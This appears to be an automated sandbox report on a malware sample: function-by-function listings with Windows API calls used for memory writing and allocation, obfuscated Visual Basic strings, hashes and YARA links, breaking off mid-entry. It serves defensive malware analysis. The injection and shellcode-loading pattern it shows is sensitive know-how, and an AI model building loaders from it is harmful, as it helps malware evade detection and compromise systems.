Opcode Fuzzy Hash: 9c4d5e43c882dd79a1adb8a80fd34f45629f341f166f7f4933ae0d3247e1dac4
Instruction Fuzzy Hash: 02519776200298DFDF7A8F28CD41BDA7BB6FF88300F144029EE499B621C7759A528B44

Uniqueness

Uniqueness Score: -1.00%

Function 023B6BC5, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 119nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD

Strings

$M, xrefs: 023B6E9E
d-, xrefs: 023B6C1F

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M$d-
API String ID: 3527976591-3139223441
Opcode ID: f58f22a4ccc1e04946cfadca2ee365e874d90cc02062fc19c80866dcc94ae4bc
Instruction ID: b536c92d1b6fc4fc5a3e17db351b8fe6bece5a015be372878b270a8c85ceb972
Opcode Fuzzy Hash: f58f22a4ccc1e04946cfadca2ee365e874d90cc02062fc19c80866dcc94ae4bc
Instruction Fuzzy Hash: 08519775200288DFDF7A8F29CD45BDA7BB6FF98300F104029EE499A621C7759A928F44

Uniqueness

Uniqueness Score: -1.00%

Function 023B2045, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

l, xrefs: 023B20C2

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: l
API String ID: 0-2517025534
Opcode ID: fce3111336460c3dffc1152e58475bae45235b0768f7a165bad2e0e39c0b97ed
Instruction ID: 0fbf8b5bbc59c0a236762dc7b8fd6eee12efa99b490ceed0d151927d50054068
Opcode Fuzzy Hash: fce3111336460c3dffc1152e58475bae45235b0768f7a165bad2e0e39c0b97ed
Instruction Fuzzy Hash: 977188319087849BC736DF38CC947DABBB1AF42314F14429DDA98CFA92C7308646CB51

Uniqueness

Uniqueness Score: -1.00%

Function 023B6CE1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 023B6CBD

Strings

$M, xrefs: 023B6E9E

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M
API String ID: 3527976591-498354199
Opcode ID: a38de65c019c2c2f645aeb616766ff709b68d44f941d38cf73d11d982516dad4
Instruction ID: ca3b461bbc6622b6c86b190fb5fed0210d8d4209c0bcd11a97e8cf569835e11f
Opcode Fuzzy Hash: a38de65c019c2c2f645aeb616766ff709b68d44f941d38cf73d11d982516dad4
Instruction Fuzzy Hash: 3F31CD75540288DFDFB68F24C9417DA3BB2FF04714F044429EE489A522C7359A918F80

Uniqueness

Uniqueness Score: -1.00%

Function 023BA8BF, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9b70a06bce648d8583238d81e27459b42c6f253e5a4c4bed79cc7564def3051
Instruction ID: e8440228f91ec1a8da233800c48f5e9465d99bf51f35f25aeb4c162094001958
Opcode Fuzzy Hash: b9b70a06bce648d8583238d81e27459b42c6f253e5a4c4bed79cc7564def3051
Instruction Fuzzy Hash: CF412472A49298DBDF789F348D65BEA37A6AF85720F41011EEE0E8B700D7318A40CF51

Uniqueness

Uniqueness Score: -1.00%

Function 023B76AD, Relevance: 1.6, APIs: 1, Instructions: 101memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 023B94E5: LoadLibraryA.KERNELBASE(?,74943F2C,?,023B772D,07B490AF), ref: 023B9684

NtAllocateVirtualMemory.NTDLL(201D6911,?,-67359B78), ref: 023B7864

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: dc811766c31f0888bcc64f9d77105b8f2004193ee5f56a3f5cde8f1f04a0954a
Instruction ID: 6c1c0d3d7ac98f346941ef4bd552748edd5d14b186f990a2cbd466f996d9c50e
Opcode Fuzzy Hash: dc811766c31f0888bcc64f9d77105b8f2004193ee5f56a3f5cde8f1f04a0954a
Instruction Fuzzy Hash: 0241C0B56042899FEB359E29CC947EB77B2EF9A314F40412EDD898B614D7308A85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 023B73C1, Relevance: 1.6, APIs: 1, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42BDB9AB), ref: 023B7536

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a3718272f8100551f48d5a36edfd00569317f81eaa819ae6dfcbb43bccc1670
Instruction ID: 4e9cdbfb2fb0e22e59d8f1b6a89ac4c41bf534f31cfc7c983c1b5f41159d211c
Opcode Fuzzy Hash: 8a3718272f8100551f48d5a36edfd00569317f81eaa819ae6dfcbb43bccc1670
Instruction Fuzzy Hash: FD112276508345DFEB64DE78CA856EBBBE1EF54700F92882CDCCAA6559D7304A81CB03

Uniqueness

Uniqueness Score: -1.00%

Function 023BB688, Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 023BB738

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 78fa469b3b9852da5db2e0d537aa403d9f82bc54015a81db79dd4d7ccd9aa116
Instruction ID: f3b96fc84a798f186694793258bf82f262dad1b2933dc6c9b8bf807bfe8f92c6
Opcode Fuzzy Hash: 78fa469b3b9852da5db2e0d537aa403d9f82bc54015a81db79dd4d7ccd9aa116
Instruction Fuzzy Hash: 06F03C716182849FDB78CE28CD457EE77A5EB98301F00412DA849EB344C7309E00CB16

Uniqueness

Uniqueness Score: -1.00%

Function 00413E00, Relevance: 321.6, APIs: 161, Strings: 22, Instructions: 1312COMMON

Download Yara Rule

APIs

#646.MSVBVM60(?), ref: 00413EFF
__vbaStrMove.MSVBVM60 ref: 00413F0D
__vbaStrCmp.MSVBVM60(rebninger,00000000), ref: 00413F19
__vbaFreeStr.MSVBVM60 ref: 00413F2E
__vbaFreeVar.MSVBVM60 ref: 00413F3A
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 00413F5B
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000014), ref: 00413F83
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411964,000000B8), ref: 00413FB3
__vbaFreeObj.MSVBVM60 ref: 00413FBF
#541.MSVBVM60(0000000A,15:15:15), ref: 00413FD1
__vbaStrVarMove.MSVBVM60(0000000A), ref: 00413FDE
__vbaStrMove.MSVBVM60 ref: 00413FE9
__vbaFreeVar.MSVBVM60 ref: 00413FF5
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 0041400D
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000014), ref: 00414035
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411964,00000070), ref: 0041405F
__vbaFreeObj.MSVBVM60 ref: 0041406B
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 00414083
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,0000001C), ref: 004140AB
__vbaHresultCheckObj.MSVBVM60(00000000,?,004119AC,00000060), ref: 00414114
__vbaFreeObj.MSVBVM60 ref: 00414120
__vbaStrToAnsi.MSVBVM60(?,MEG), ref: 00414132
__vbaSetSystemError.MSVBVM60(00000000), ref: 00414140
__vbaFreeStr.MSVBVM60 ref: 0041414C
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 0041417A
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000014), ref: 004141A2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411964,00000068), ref: 004141CC
__vbaFreeObj.MSVBVM60 ref: 004141D8
#610.MSVBVM60(0000000A), ref: 004141E5
#552.MSVBVM60(?,0000000A,00000001), ref: 004141FB
__vbaVarMove.MSVBVM60 ref: 0041420D
__vbaFreeVar.MSVBVM60 ref: 00414219
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 00414231
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000014), ref: 00414259
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411964,0000013C), ref: 004142C8
__vbaFreeObj.MSVBVM60 ref: 004142D4
__vbaLateMemCall.MSVBVM60(?,Ytf0FfwBKC98,00000003), ref: 00414363
__vbaSetSystemError.MSVBVM60(000BC9FA), ref: 00414378
#612.MSVBVM60(0000000A), ref: 00414391
__vbaStrVarMove.MSVBVM60(0000000A), ref: 0041439E
__vbaStrMove.MSVBVM60 ref: 004143B2
__vbaFreeVar.MSVBVM60 ref: 004143BA
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 004143D3
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000014), ref: 00414401
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411964,00000110), ref: 00414435
__vbaStrMove.MSVBVM60 ref: 0041444A
__vbaFreeObj.MSVBVM60 ref: 00414458
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 0041446D
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000014), ref: 00414495
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411964,00000108), ref: 004144C1
__vbaFreeObj.MSVBVM60 ref: 004144C9
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 004144DE
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000044), ref: 004145DA
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 00414623
__vbaFreeVar.MSVBVM60 ref: 0041462F
__vbaStrToAnsi.MSVBVM60(?,finmekaniker), ref: 00414646
__vbaSetSystemError.MSVBVM60(00000000), ref: 00414654
__vbaFreeStr.MSVBVM60 ref: 00414660
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 0041468E
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000014), ref: 004146B6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411964,00000068), ref: 004146E0
__vbaFreeObj.MSVBVM60 ref: 004146EC
#610.MSVBVM60(0000000A), ref: 004146F9
#552.MSVBVM60(?,0000000A,00000001), ref: 0041470F
__vbaVarMove.MSVBVM60 ref: 0041471E
__vbaFreeVar.MSVBVM60 ref: 0041472A
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 00414742
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000014), ref: 0041476A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411964,0000013C), ref: 004147D9
__vbaFreeObj.MSVBVM60 ref: 004147E5
__vbaLateMemCall.MSVBVM60(?,iApzbb76Ji65,00000003), ref: 00414871
__vbaSetSystemError.MSVBVM60(0059E365,00231721), ref: 00414890
#702.MSVBVM60(0000000A,000000FF,000000FE,000000FE,000000FE), ref: 004148C5
__vbaStrMove.MSVBVM60 ref: 004148D9
__vbaFreeVar.MSVBVM60 ref: 004148E1
#611.MSVBVM60 ref: 004148E7
__vbaStrMove.MSVBVM60 ref: 004148F2
#610.MSVBVM60(00000002), ref: 004148FB
#552.MSVBVM60(?,00000002,00000001), ref: 00414911
__vbaVarMove.MSVBVM60 ref: 00414920
__vbaFreeVar.MSVBVM60 ref: 0041492C
_adj_fdiv_m64.MSVBVM60 ref: 00414955
__vbaFpI4.MSVBVM60(432A0000,?,43110000), ref: 00414986
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00411340,000002C0,?,43110000), ref: 004149BA
__vbaStrCopy.MSVBVM60(?,43110000), ref: 004149CB
__vbaStrToAnsi.MSVBVM60(?,00000000), ref: 004149D9
__vbaSetSystemError.MSVBVM60(00707257,003ED390,?), ref: 004149F7
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00414A0D
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 00414A3E
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000014), ref: 00414A66
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411964,000000D8), ref: 00414A96
__vbaStrMove.MSVBVM60 ref: 00414AAB
__vbaFreeObj.MSVBVM60 ref: 00414AB7
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 00414ACF
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000014), ref: 00414AF7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411964,000000F0), ref: 00414B27
__vbaStrMove.MSVBVM60 ref: 00414B3F
__vbaFreeObj.MSVBVM60 ref: 00414B4B
#610.MSVBVM60(0000000A), ref: 00414B58
#552.MSVBVM60(?,0000000A,00000001), ref: 00414B6E
__vbaVarMove.MSVBVM60 ref: 00414B80
__vbaFreeVar.MSVBVM60 ref: 00414B8C
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 00414BA4
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,0000001C), ref: 00414BCC
__vbaHresultCheckObj.MSVBVM60(00000000,?,004119AC,00000064), ref: 00414BF8
__vbaFreeObj.MSVBVM60 ref: 00414C04
__vbaStrToAnsi.MSVBVM60(?,Undeviousness), ref: 00414C1C
__vbaStrToAnsi.MSVBVM60(?,charbocle,00000000), ref: 00414C2B
__vbaSetSystemError.MSVBVM60(00000000), ref: 00414C35
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00414C4B
#594.MSVBVM60(0000000A), ref: 00414C85
__vbaFreeVar.MSVBVM60 ref: 00414C91
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 00414CA9
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000014), ref: 00414CD7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411964,000000B8), ref: 00414D0B
__vbaFreeObj.MSVBVM60 ref: 00414D13
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 00414D2B
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,00000014), ref: 00414D53
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411964,000000E0), ref: 00414D7F
__vbaStrMove.MSVBVM60 ref: 00414D93
__vbaFreeObj.MSVBVM60 ref: 00414D9F
__vbaNew2.MSVBVM60(00411954,004165D8), ref: 00414DB7
__vbaHresultCheckObj.MSVBVM60(00000000,0224004C,00411944,0000001C), ref: 00414DDF
__vbaHresultCheckObj.MSVBVM60(00000000,?,004119AC,00000060), ref: 00414E3F
__vbaFreeObj.MSVBVM60 ref: 00414E4B
__vbaStrCopy.MSVBVM60 ref: 00414E8C
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00411370,000006F8), ref: 00414EC5
__vbaFreeStr.MSVBVM60 ref: 00414ED7
__vbaStrCopy.MSVBVM60 ref: 00414EF8
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00411370,000006F8), ref: 00414F31
__vbaFreeStr.MSVBVM60 ref: 00414F3D
__vbaStrCopy.MSVBVM60 ref: 00414F5E
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00411370,000006F8), ref: 00414F97
__vbaFreeStr.MSVBVM60 ref: 00414FA3
__vbaStrCopy.MSVBVM60 ref: 00414FC4
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00411370,000006F8), ref: 00414FFD
__vbaFreeStr.MSVBVM60 ref: 00415009
__vbaStrCopy.MSVBVM60 ref: 0041502A
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00411370,000006F8), ref: 00415063
__vbaFreeStr.MSVBVM60 ref: 0041506F
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00411340,000002B4), ref: 0041508C
__vbaVarAdd.MSVBVM60(0000000A,?,?), ref: 004150CA
__vbaVarMove.MSVBVM60 ref: 004150D1
#598.MSVBVM60 ref: 004150D7
__vbaVarTstLt.MSVBVM60(00000002,?), ref: 004150F8
__vbaFreeVar.MSVBVM60(004151D1), ref: 00415162
__vbaFreeStr.MSVBVM60 ref: 0041516D
__vbaFreeStr.MSVBVM60 ref: 00415172
__vbaFreeObj.MSVBVM60 ref: 0041517D
__vbaFreeStr.MSVBVM60 ref: 00415182
__vbaFreeVar.MSVBVM60 ref: 00415187
__vbaFreeStr.MSVBVM60 ref: 0041518C
__vbaFreeVar.MSVBVM60 ref: 00415191
__vbaFreeObj.MSVBVM60 ref: 00415196
__vbaFreeStr.MSVBVM60 ref: 0041519E
__vbaFreeObj.MSVBVM60 ref: 004151A6
__vbaFreeStr.MSVBVM60 ref: 004151AE
__vbaFreeStr.MSVBVM60 ref: 004151B6

Strings

charbocle, xrefs: 00414C25
rebninger, xrefs: 00413F14
finmekaniker, xrefs: 0041463E
extralegal, xrefs: 0041479A
Wrp, xrefs: 00414668
GAARDES, xrefs: 0041451A
Crepey, xrefs: 00414307
liquidated, xrefs: 004149C0
CLAMATORES, xrefs: 00414F3F
Organophone2, xrefs: 00414ED9
Undeviousness, xrefs: 00414C16
problemsgende, xrefs: 00414E0F
Ytf0FfwBKC98, xrefs: 00414346
iApzbb76Ji65, xrefs: 00414857
15:15:15, xrefs: 00413FCB
Commutual, xrefs: 0041500B
Syndromerne5, xrefs: 00414818
Scopulousness, xrefs: 00414289
Hypnotizabilities, xrefs: 00414FA5
Valutareservernes, xrefs: 00414E6D
MEG, xrefs: 0041412C
SEMIMALIGNANT, xrefs: 004140DB

Memory Dump Source

Source File: 00000001.00000002.32665765377.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.32665730461.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.32665908643.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.32665942376.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$CopyErrorSystem$Ansi$#552#610$Late$CallList$#541#594#598#611#612#646#702_adj_fdiv_m64
String ID: 15:15:15$CLAMATORES$Commutual$Crepey$GAARDES$Hypnotizabilities$MEG$Organophone2$SEMIMALIGNANT$Scopulousness$Syndromerne5$Undeviousness$Valutareservernes$Wrp$Ytf0FfwBKC98$charbocle$extralegal$finmekaniker$iApzbb76Ji65$liquidated$problemsgende$rebninger
API String ID: 2302085476-689379688
Opcode ID: f1792f72988de27c70c5bf8cd4df38c8e41023503000a4e09620b4630475d28a
Instruction ID: cc5b69b219045f30246a0569de28392265c9986ccb27710fb6c1dedbcdc9d664
Opcode Fuzzy Hash: f1792f72988de27c70c5bf8cd4df38c8e41023503000a4e09620b4630475d28a
Instruction Fuzzy Hash: EAC28F70900219AFCB24DF64DC89BE9BBB5FB48304F1085AAE14EB72A4DB745AC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00401378, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6"*), ref: 0040137D

Strings

VB5!6"*, xrefs: 00401378

Memory Dump Source

Source File: 00000001.00000002.32665765377.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.32665730461.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.32665908643.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.32665942376.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6"*
API String ID: 1341478452-2992194029
Opcode ID: 0cbbcf3e6960033bdfc73981f7854c4ef6d83e89043feb0ad1be145916ad9ec0
Instruction ID: de1b4099ddef439ef961e277567c93a883eaa8dc164cbddf7ebed2e2a4e262b6
Opcode Fuzzy Hash: 0cbbcf3e6960033bdfc73981f7854c4ef6d83e89043feb0ad1be145916ad9ec0
Instruction Fuzzy Hash: 1001459009E7D56FD31757715C29AA23F789E1326470A11DBD8C1CA0B3C01D089AC776

Uniqueness

Uniqueness Score: -1.00%

Function 023B742D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42BDB9AB), ref: 023B7536

Strings

p, xrefs: 023B7430

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: p
API String ID: 823142352-2181537457
Opcode ID: a0ff5569318f6e7578e4edaa97960c17dc944f2a1d37b21945509c18d9c45003
Instruction ID: df6ca524abcd308074f7a7e57e0e2856bfd0b9a53e34eeb82764a50a1771f50e
Opcode Fuzzy Hash: a0ff5569318f6e7578e4edaa97960c17dc944f2a1d37b21945509c18d9c45003
Instruction Fuzzy Hash: 65112675508345DFEB64EE39CA847EBBBE5EF55300F81842CC9C9A6559D7300A81CB16

Uniqueness

Uniqueness Score: -1.00%

Function 023B94E5, Relevance: 1.6, APIs: 1, Instructions: 61libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,74943F2C,?,023B772D,07B490AF), ref: 023B9684

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b74f09d66edd0962444207be4a7637472c23606b85ae2e75a59f4133140dc3d6
Instruction ID: 959cc99bb13d58bb2fed0245a288268a20adc3d7f8f07fade3db4f02436f01c5
Opcode Fuzzy Hash: b74f09d66edd0962444207be4a7637472c23606b85ae2e75a59f4133140dc3d6
Instruction Fuzzy Hash: 1C21A171A09298CBDF399F348D65BDE37B5AF85720F80421AEE1ECB604D7305A408E56

Uniqueness

Uniqueness Score: -1.00%

Function 023B73F5, Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42BDB9AB), ref: 023B7536

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4fe7f21e911c81e09f798480acbd6b437927b0dc5200b272bdc7052072e95d6e
Instruction ID: fc8bb247fefaa4ec161b7b8e04dad27787a0b311884e482ced13373f42289851
Opcode Fuzzy Hash: 4fe7f21e911c81e09f798480acbd6b437927b0dc5200b272bdc7052072e95d6e
Instruction Fuzzy Hash: 90115676608341CFD764DE78C9813EBB7E5EF04300FA1842DCDC9A654AC7308682CB06

Uniqueness

Uniqueness Score: -1.00%

Function 023B7401, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42BDB9AB), ref: 023B7536

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 45d7fcfdb5a61dd9def591d86d848f48bb23af22b8219d3a442f32e2b360f66f
Instruction ID: 670b6c730a43491eff603318c088cba0838911de177191aab640e4e69335d6ee
Opcode Fuzzy Hash: 45d7fcfdb5a61dd9def591d86d848f48bb23af22b8219d3a442f32e2b360f66f
Instruction Fuzzy Hash: 8D112F76508345CFDB64DE38C9852EBBBE5EF04710F91882DC9C9A6549C3308A81CB06

Uniqueness

Uniqueness Score: -1.00%

Function 023B740D, Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42BDB9AB), ref: 023B7536

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 33a989f4028373e9e957bbb7cdb1be8f6997c75bda427d72c972c56da383c7b8
Instruction ID: 4ba3a1641701806ecb2d5a79aad0a5e296e9f9a174894762ab23f2026e9e32fe
Opcode Fuzzy Hash: 33a989f4028373e9e957bbb7cdb1be8f6997c75bda427d72c972c56da383c7b8
Instruction Fuzzy Hash: 99115336508345CFD7649E38C9802EBBBE5EF15700F91842DCCC9A645AC3308A81CB12

Uniqueness

Uniqueness Score: -1.00%

Function 023B7419, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42BDB9AB), ref: 023B7536

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b8266604247e9205a057444c0c52e71f6f4032aaccdea097f5978e85a1b815f0
Instruction ID: 0690f474d690244bb5a54817421c13b4f3f4ff7ffb768fad34ffd4dc3b24451c
Opcode Fuzzy Hash: b8266604247e9205a057444c0c52e71f6f4032aaccdea097f5978e85a1b815f0
Instruction Fuzzy Hash: 13115536508345CFD768DE38C9807EBB7E5EF01300F91842CCCCAA6449C7304981CB06

Uniqueness

Uniqueness Score: -1.00%

Function 023B74F5, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecfa3bb5edab510a230b22b9ff9bf029827cfc7de6033f4848bb2d9beb15494d
Instruction ID: 0eb93d705eca9bdf24402fbfe14a24b0dd784adc2d578b185919f4ecae192350
Opcode Fuzzy Hash: ecfa3bb5edab510a230b22b9ff9bf029827cfc7de6033f4848bb2d9beb15494d
Instruction Fuzzy Hash: 85F027379642868BE721CE2888C43EBBB54EFA0731FA0C17ECA4D1A5CA86315542CF24

Uniqueness

Uniqueness Score: -1.00%

Function 023B7501, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e63fc344c05a7eff0cab59cb7fdf2dbfe83ad39630be29803068ac693a7177
Instruction ID: f03168afea97694aabe698adc01382fa7bd24357beddda00446ea7bd085a243b
Opcode Fuzzy Hash: 90e63fc344c05a7eff0cab59cb7fdf2dbfe83ad39630be29803068ac693a7177
Instruction Fuzzy Hash: AFF05C3765028A8FEB31CE19C8907EB7794EF90731F90C13DCA4D5A5C986305501CB10

Uniqueness

Uniqueness Score: -1.00%

Function 023B74E9, Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,42BDB9AB), ref: 023B7536

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0449630fafce5696039135a9610ba7b9e769e40e9e949e18f285c86dbf9b968b
Instruction ID: 47e5aa923a95d0aacedec291e30eb18db932e3cb00ee47832f4087e183263957
Opcode Fuzzy Hash: 0449630fafce5696039135a9610ba7b9e769e40e9e949e18f285c86dbf9b968b
Instruction Fuzzy Hash: 08E0CD755101469FE720CE14C4D47DB7354EF44710F90C039CE0D5E68B86305501C724

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 023BAAF9, Relevance: 4.3, Strings: 3, Instructions: 539COMMON

Download Yara Rule

Strings

*S{, xrefs: 023BB090
<sn,, xrefs: 023BB486
<sn,, xrefs: 023BB48B

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: *S{$<sn,$<sn,
API String ID: 3389902171-1237897368
Opcode ID: 578e6fda8ac44374062e520f7830ab76bae9dbc53b1cb81818f323309282d86e
Instruction ID: dc0b85d44a1373a547cea9cd03dda0bd91a166890027400ac9a09bbb65e8f48f
Opcode Fuzzy Hash: 578e6fda8ac44374062e520f7830ab76bae9dbc53b1cb81818f323309282d86e
Instruction Fuzzy Hash: 953208716083858FDB36CF38C8987DABBA2AF52354F49829ECD994F696D7308541CB12

Uniqueness

Uniqueness Score: -1.00%

Function 023B7A08, Relevance: 2.7, Strings: 2, Instructions: 247COMMON

Download Yara Rule

Strings

SW-1, xrefs: 023B7D07
b6c, xrefs: 023B7D28

Memory Dump Source

Source File: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: SW-1$b6c
API String ID: 1029625771-2125158211
Opcode ID: f66708f78c3c2f22292cd327e660c865fe70e079d41e74e2186d776f6dafd08b
Instruction ID: 26456994d7f4be1fb6baa5de119be959142f15ec1c21fb3b2279c895d107983b
Opcode Fuzzy Hash: f66708f78c3c2f22292cd327e660c865fe70e079d41e74e2186d776f6dafd08b
